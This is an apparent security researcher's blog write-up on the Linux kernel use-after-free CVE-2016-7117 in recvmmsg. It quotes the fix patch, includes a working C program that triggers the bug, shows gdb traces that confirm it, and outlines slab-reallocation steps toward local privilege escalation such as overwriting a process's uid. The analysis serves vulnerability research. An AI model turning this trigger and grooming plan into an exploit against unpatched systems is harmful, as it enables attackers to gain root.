Notes about CVE-2016-7117
It's hard to find information about this, so I started looking deeper.
The Register has some cursory information:
The first of these (CVE-2016-7117) lies in the kernel networking subsystem allowing remote attackers to execute arbitrary code in the context of the kernel.
("Another critical hole (CVE-2016-0758 ) allows installed apps to execute arbitrary code within the context of the kernel via an elevation of privilege vulnerability in the kernel ASN.1 decoder." sounds fun too…)
The Debian and Ubuntu bug trackers both describe this as "use after
free in the recvmmsg exit path", which is a big hint. The Debian page
lists 4.5.2-1 as the "Fixed Version", which was released in April.
That page's changelog includes "net: Fix use after free in the
recvmmsg exit path". And so I found this email from March from Arnaldo
Carvalho de Melo, with a patch:
    diff --git a/net/socket.c b/net/socket.c
    index c044d1e8508c..db13ae893dce 100644
    --- a/net/socket.c
    +++ b/net/socket.c
    @@ -2240,31 +2240,31 @@ int __sys_recvmmsg(int fd, struct mmsghdr __user *mmsg, unsigned int vlen,
             cond_resched();
         }
     
    -out_put:
    -    fput_light(sock->file, fput_needed);
    -
         if (err == 0)
    -        return datagrams;
    +        goto out_put;
     
    -    if (datagrams != 0) {
    +    if (datagrams == 0) {
    +        datagrams = err;
    +        goto out_put;
    +    }
    +
    +    /*
    +     * We may return less entries than requested (vlen) if the
    +     * sock is non block and there aren't enough datagrams...
    +     */
    +    if (err != -EAGAIN) {
             /*
    -         * We may return less entries than requested (vlen) if the
    -         * sock is non block and there aren't enough datagrams...
    +         * ... or if recvmsg returns an error after we
    +         * received some datagrams, where we record the
    +         * error to return on the next call or if the
    +         * app asks about it using getsockopt(SO_ERROR).
              */
    -        if (err != -EAGAIN) {
    -            /*
    -             * ... or if recvmsg returns an error after we
    -             * received some datagrams, where we record the
    -             * error to return on the next call or if the
    -             * app asks about it using getsockopt(SO_ERROR).
    -             */
    -            sock->sk->sk_err = -err;
    -        }
    -
    -        return datagrams;
    +        sock->sk->sk_err = -err;
         }
    +out_put:
    +    fput_light(sock->file, fput_needed);
     
    -    return err;
    +    return datagrams;
     }
     
     SYSCALL_DEFINE5(recvmmsg, int, fd, struct mmsghdr __user *, mmsg,
    -- 
    2.5.0
This was merged and became 34b88a6 in the kernel repository.
This code is in __sys_recvmmsg; it looks roughly like this (before
the fix, at b6e4038, with irrelevant bits replaced with /* ... */):
    int __sys_recvmmsg(int fd, struct mmsghdr __user *mmsg, unsigned int vlen,
                       unsigned int flags, struct timespec *timeout)
    {
        int fput_needed, err, datagrams;
        struct socket *sock;
        struct mmsghdr __user *entry;
        struct compat_mmsghdr __user *compat_entry;
        struct msghdr msg_sys;
        struct timespec end_time;

        if (timeout &&
            poll_select_set_timeout(&end_time, timeout->tv_sec,
                                    timeout->tv_nsec))
            return -EINVAL;

        datagrams = 0;

        sock = sockfd_lookup_light(fd, &err, &fput_needed);
        if (!sock)
            return err;

        err = sock_error(sock->sk);
        if (err)
            goto out_put;

        entry = mmsg;
        compat_entry = (struct compat_mmsghdr __user *)mmsg;

        while (datagrams < vlen) {
            /* ... */
            err = ___sys_recvmsg(sock, (struct user_msghdr __user *)entry,
                                 &msg_sys, flags & ~MSG_WAITFORONE,
                                 datagrams);
            if (err < 0)
                break;
            err = put_user(err, &entry->msg_len);
            ++entry;

            if (err)
                break;
            ++datagrams;
            /* ... */
        }

    out_put:
        fput_light(sock->file, fput_needed);

        if (err == 0)
            return datagrams;

        if (datagrams != 0) {
            /*
             * We may return less entries than requested (vlen) if the
             * sock is non block and there aren't enough datagrams...
             */
            if (err != -EAGAIN) {
                /*
                 * ... or if recvmsg returns an error after we
                 * received some datagrams, where we record the
                 * error to return on the next call or if the
                 * app asks about it using getsockopt(SO_ERROR).
                 */
                sock->sk->sk_err = -err;
            }

            return datagrams;
        }

        return err;
    }
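Both versions call sockfd_lookup_light and later fput_light. The old
code calls fput_light at out_put and only then looks at err, so it can
still touch sock after dropping its reference; the new code moves
fput_light after the last use of sock. The email explains: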
And, as Dmitry rightly assessed, that is because we can drop the reference and then touch it when the underlying recvmsg calls return some packets and then hit an error, which will make recvmmsg to set sock->sk->sk_err, oops, fix it.
So, to demonstrate the use after free:
- recvmmsg calls sockfd_lookup_light, which probably increases the refcount.
- recvmmsg calls recvmsg.
- recvmsg returns a real packet.
- datagrams is incremented from 0.
- recvmmsg calls recvmsg.
- recvmsg returns an error other than -EAGAIN.
- recvmmsg breaks to the end of the while.
- fput_light is called, which decreases the refcount if it was increased above. Then the struct socket may be freed at any point.
- err != 0, so we don't return datagrams.
- datagrams != 0, and err != -EAGAIN, so we do sock->sk->sk_err = -err. This sock may have been freed after fput_light, so this is a use after free.
Questions:
- How do we make recvmsg error for the second packet?
- For a use-after-free, we need that to actually have been freed. How do we do that?
- Ultimately we want to get the allocation that takes the place where sock was, fill in the sk pointer, and get the kernel to write to a place we choose. Is that realistic?
I'm going to think about this first from the perspective of a local user, since remote exploitation seems much harder.
Making recvmsg err
So __sys_recvmmsg calls ___sys_recvmsg, which calls
copy_msghdr_from_user(msg_sys, msg, &uaddr, &iov); and returns an
error if that call fails:
    if (MSG_CMSG_COMPAT & flags)
        err = get_compat_msghdr(msg_sys, msg_compat, &uaddr, &iov);
    else
        err = copy_msghdr_from_user(msg_sys, msg, &uaddr, &iov);
    if (err < 0)
        return err;
This looks promising (in copy_msghdr_from_user):
    if (!access_ok(VERIFY_READ, umsg, sizeof(*umsg)) ||
        __get_user(uaddr, &umsg->msg_name) ||
        __get_user(kmsg->msg_namelen, &umsg->msg_namelen) ||
        __get_user(uiov, &umsg->msg_iov) ||
        __get_user(nr_segs, &umsg->msg_iovlen) ||
        __get_user(kmsg->msg_control, &umsg->msg_control) ||
        __get_user(kmsg->msg_controllen, &umsg->msg_controllen) ||
        __get_user(kmsg->msg_flags, &umsg->msg_flags))
        return -EFAULT;
and the manpage says
    ERRORS
        These are some standard errors generated by the socket layer. Additional errors may be generated and returned from the underlying protocol modules; see their manual pages.
        …
        EFAULT The receive buffer pointer(s) point outside the process's address space.
So I think we can send two valid messages, and have the second
recvmmsg header point to a bad receive buffer.
Closing the socket
This should be as easy as closing the socket in question in a thread
while another thread is in recvmmsg.
Trying it out
We'll try triggering the panic from userspace.
    /* -*- compile-command: "gcc -Wall -Werror -pthread -static try_recvmmsg.c -o try_recvmmsg" -*- */
    #define _GNU_SOURCE
    #include <errno.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <unistd.h>
    #include <stdio.h>
    #include <pthread.h>

    #define msg "hello!"

    struct thread_config {
        int fds[2];
        char data[1024];
    };

    void *send_and_close_in_thread (void *arg) {
        struct thread_config *config = arg;

        /* send the messages */
        for (size_t i = 0; i < 2; i++) {
            if (send(config->fds[0], msg, sizeof(msg), 0) != sizeof(msg)) {
                fprintf(stderr, "++ in send: %m\n");
                close(config->fds[0]);
                close(config->fds[1]);
                return NULL;
            }
        }

        /* wait for it to be received, then close things, so that the
           kernel doesn't EBADF */
        while (config->data[0] != msg[0]);;
        close(config->fds[0]);
        close(config->fds[1]);
        return NULL;
    }

    int main (int argc, char **argv) {
        fprintf(stderr, "++ running!\n");

        struct thread_config config = {0};
        if (socketpair(AF_LOCAL, SOCK_DGRAM, 0, config.fds)) {
            fprintf(stderr, "++ in socketpair: %m\n");
            return 1;
        }

        pthread_t thread = {0};
        if (pthread_create(&thread, NULL, send_and_close_in_thread, &config)) {
            fprintf(stderr, "++ in pthread_create: %m\n");
            close(config.fds[0]);
            close(config.fds[1]);
            return 1;
        }

        /* receive the first message fine. try to receive the second
           message to a buffer out of our address space, so that
           ___sys_recvmsg will return EFAULT. */
        recvmmsg(config.fds[1],
                 (struct mmsghdr[2]) {
                     { .msg_hdr = {
                           .msg_iov = & (struct iovec) {
                               .iov_base = &config.data,
                               .iov_len = sizeof(config.data)
                           },
                           .msg_iovlen = 1
                       } },
                     { .msg_hdr = {
                           .msg_iov = & (struct iovec) {
                               .iov_base = (void*) (~0),
                               .iov_len = 1024,
                           },
                           .msg_iovlen = 1
                       } },
                 },
                 2,
                 0,
                 & (struct timespec) { .tv_sec = 1 });

        fprintf(stderr, "++ no panic? got %s.\n", config.data);
        return 1;
    }
The timing is a little tricky: we have a thread send messages, wait
for the first one to be received, and then close the fds. If it closes
before the call to __sys_recvmmsg, __sys_recvmmsg will return EBADF.
If it closes after __sys_recvmmsg sets the error on the struct sock,
we won't get a use-after-free.
Then the main thread tries to recvmmsg two messages, with a bad
result buffer pointer on the second one. This way the second
___sys_recvmsg call errors, getting us on the code path described
above.
I checked this was the right code path like this (gdb connected to
qemu):
    (gdb) b copy_msghdr_from_user
    Breakpoint 21 at 0xffffffff82668db0: file net/socket.c, line 1823.
    (gdb) c
    Continuing.
    [Switching to Thread 1]

    Thread 1 hit Breakpoint 21, copy_msghdr_from_user (kmsg=0xffff88006b737df8, umsg=0x7ffc232faa80, save_addr=0xffff88006b737ad0, iov=0xffff88006b737a90) at net/socket.c:1823
    1823    {
    (gdb) finish
    Run till exit from #0 copy_msghdr_from_user (kmsg=0xffff88006b737df8, umsg=0x7ffc232faa80, save_addr=0xffff88006b737ad0, iov=0xffff88006b737a90) at net/socket.c:1823
    0xffffffff82669b89 in ___sys_recvmsg (sock=0xffff88006b737e18, msg=0x1ffff1000d6e6003, msg_sys=0xffff88006b737df8, flags=225341379, nosec=<optimized out>) at net/socket.c:2091
    2091    err = copy_msghdr_from_user(msg_sys, msg, &uaddr, &iov);
    Value returned is $59 = 0
    (gdb) c
    Continuing.

    Thread 1 hit Breakpoint 21, copy_msghdr_from_user (kmsg=0xffff88006b737df8, umsg=0x7ffc232faac0, save_addr=0xffff88006b737ad0, iov=0xffff88006b737a90) at net/socket.c:1823
    1823    {
    (gdb) finish
    Run till exit from #0 copy_msghdr_from_user (kmsg=0xffff88006b737df8, umsg=0x7ffc232faac0, save_addr=0xffff88006b737ad0, iov=0xffff88006b737a90) at net/socket.c:1823
    0xffffffff82669b89 in ___sys_recvmsg (sock=0xffff88006b737b10, msg=0xffff88006b737b28, msg_sys=0xffff88006b737df8, flags=225341266, nosec=<optimized out>) at net/socket.c:2091
    2091    err = copy_msghdr_from_user(msg_sys, msg, &uaddr, &iov);
    Value returned is $60 = -14
    (gdb) b socket.c:2265
    Breakpoint 22 at 0xffffffff8266b892: file net/socket.c, line 2265.
    (gdb) c
    Continuing.

    Thread 1 hit Breakpoint 22, __sys_recvmmsg (fd=<optimized out>, mmsg=0x7ffc232faac0, vlen=<optimized out>, flags=0, timeout=0xffff88006b737ee0) at net/socket.c:2265
    2265    sock->sk->sk_err = -err;
    (gdb)
After running it under gdb many times in a VM built on b6e4038 (the
commit immediately before the fix), I got this (my notes in /* ... */
inline):
    (gdb) b __sys_recvmmsg
    Breakpoint 12 at 0xffffffff8266b440: file net/socket.c, line 2171.
    (gdb) b socket.c:2265 /* sock->sk->sk_err = -err; */
    Breakpoint 15 at 0xffffffff8266b892: file net/socket.c, line 2265.
    (gdb) c
    Continuing.

    Thread 2 hit Breakpoint 12, __sys_recvmmsg (fd=4, mmsg=0x7fff9f3ccc40, vlen=2, flags=0, timeout=0xffff88006c4e7ee0) at net/socket.c:2171
    2171    {
    /* temporary break at sockfd_lookup_light so we can 'finish' in it
       to see what it returns, as a cute trick to get around
       "<optimized out>" */
    (gdb) tbreak sockfd_lookup_light
    Temporary breakpoint 20 at 0xffffffff82665940: file net/socket.c, line 450.
    (gdb) c
    Continuing.

    Thread 2 hit Temporary breakpoint 20, sockfd_lookup_light (fd=4, err=0xffff88006c4e7d38, fput_needed=0xffff88006c4e7cf8) at net/socket.c:450
    450     {
    (gdb) finish
    Run till exit from #0 sockfd_lookup_light (fd=4, err=0xffff88006c4e7d38, fput_needed=0xffff88006c4e7cf8) at net/socket.c:450
    __sys_recvmmsg (fd=4, mmsg=0x7fff9f3ccc40, vlen=<optimized out>, flags=0, timeout=0xffff88006c4e7ee0) at net/socket.c:2187
    2187    if (!sock)
    Value returned is $50 = (struct socket *) 0xffff88006bf61e00
    (gdb) c
    Continuing.

    Thread 2 hit Breakpoint 15, __sys_recvmmsg (fd=<optimized out>, mmsg=0x7fff9f3ccc80, vlen=<optimized out>, flags=0, timeout=0xffff88006c4e7ee0) at net/socket.c:2265
    2265    sock->sk->sk_err = -err;
    /* !!! */
    (gdb) p ((struct socket *)0xffff88006bf621c0)->file.f_count
    Cannot access memory at address 0x38
    /* ->file has been zeroed out, meaning this has been freed and used
       for something else */
    (gdb) p ((struct socket *)0xffff88006bf621c0)->sk
    $52 = (struct sock *) 0x0 <irq_stack_union>
    (gdb) p &(((struct socket *)0xffff88006bf621c0)->sk->sk_err)
    $53 = (int *) 0x1b0 <irq_stack_union+432>
    (gdb)
So yes, we've got a use-after-free, and the kernel writes -err to the
address 0x1b0.
Why does it only work sometimes? I think it's because the actual free
and reuse happen outside of the fput_light call tree, so we're racing
with another task or two in the kernel. But we can do it repeatedly
until it does work; it doesn't take long.
Reallocation
So we need to put some data where that struct socket used to be, such
that sk is a pointer to a piece of data whose offset sk_err is where
we would like to write.
struct socket is part of struct socket_alloc:
    struct socket_alloc {
        struct socket socket;
        struct inode vfs_inode;
    };
They're allocated in sock_alloc / sock_alloc_inode using the slab
allocator. This means that they're grabbed from "caches", which are
spread across multiple "slabs". Caches are homogeneous type-wise, and
e.g. each struct socket_alloc in a cache is pre-initialized.
Some resources about the slab allocator:
- "Slab Allocation" on Wikipedia
- "Anatomy of the Linux Slab Allocator" on IBM developerworks (apparently no longer available, so this is a link to an archive).
I can think of a situation where we can use the slab allocator to get what we want to happen:
- The slabs that are part of the struct socket_alloc cache (sock_inode_cache) fill up.
- We create a socketpair for our use-after-free that occupies the first and second slot in a new slab.
- We close both elements of our socketpair. This causes the slab to be freed. We then immediately add some items (more than a slabfull) to another cache, with the pointer we want to write to at offset sk in each item.
- This causes a new slab to be allocated for the second cache, which ideally will be exactly where our first cache used to be. So, the struct socket pointer in __sys_recvmmsg now points to an item we control in a new slab.
- The kernel code runs and sets the offset sk_err from our pointer to -err.
Some things that make it easier:
- We can just repeatedly try it until it works, allocating an extra socket each time so that we progress through the slab.
- /proc/slabinfo says that the sock_inode_cache slab has 12 objects per slab (in my vm; it seems to vary). This is an upper bound on the number of sockets we'll need to open to get an object at the beginning of the slab, assuming no other process is creating sockets.
That sounds totally possible!
What are we getting the kernel to write? err is -14 in our case, so
the kernel is writing 14 for us. If we control the pointer, though, we
can line it up only partially with a field we want to overwrite,
writing any portion of {0x0e, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00} anywhere we choose. (sk_err is declared as an int, so the store
itself may cover only the first four of those bytes.) Some ideas:
- Overwrite the uid of our process (and write 0xe to the byte before it), so that it has uid 0.
- Overwrite a return address on the stack so that the kernel returns to code we choose. (This will be tricky with KASLR.)
- Overwrite a boolean on the stack to either 0 or 0xe (truthy) to get around some permission check.
However, I'm not actually sure how aggressively slabs get reused by different caches, and I'm not sure of an easy way to find out. But! We can probably use a lot of memory to make that happen, or try freeing a couple dozen slabs at the same time.
Which cache do we try to write to?
/proc/slabinfo says the sock_inode_cache has objects of size 640.
This is kind of an inconvenient number: the only other objects with
that size are also inode caches, and they don't have any
user-controllable data at the offset of sk_err.
But the kmalloc cache kmalloc-1024 holds 1024-byte items, and 16 of
them fit in a slab. If we can find a path in the kernel that copies
data we control into a kmalloc bigger than 460 + sk_err +
sizeof(void *) = 896, we can get the kernel to set an int at an
address we choose to 14.
But there are a lot of calls to kmalloc in the kernel, and finding a
good one will take time. So I'm publishing this now; I'll write more
when I find one.
How much trouble are we in?
I think this exploit will work, so we have a pretty bad local privilege escalation bug. I was able to trigger the use-after-free in less than an hour of work after reading the description of the bug, and I'm not even a kernel hacker. Given more time I'm pretty sure I could make it repeatably write to a location of our choice.
I think this would be difficult to exploit remotely, for the following reasons:
- recvmmsg is much less common than recvmsg in the wild. GitHub search shows about 800k uses of recvmmsg vs about 3.6 million for recvmsg. recvmsg isn't all that common anyway; recv has about 29 million uses on GitHub.
- A remote attacker would need to cause the recvmsg to err and cause the socket to close while in the recvmmsg call. Looking casually, I didn't see a great way to cause recvmmsg to err from the sending side. recvmsg and recvmmsg are normally used for connectionless protocols, anyway, so I wouldn't expect it to be easy to cause a service to close its socket.
But I'd love to be proven wrong.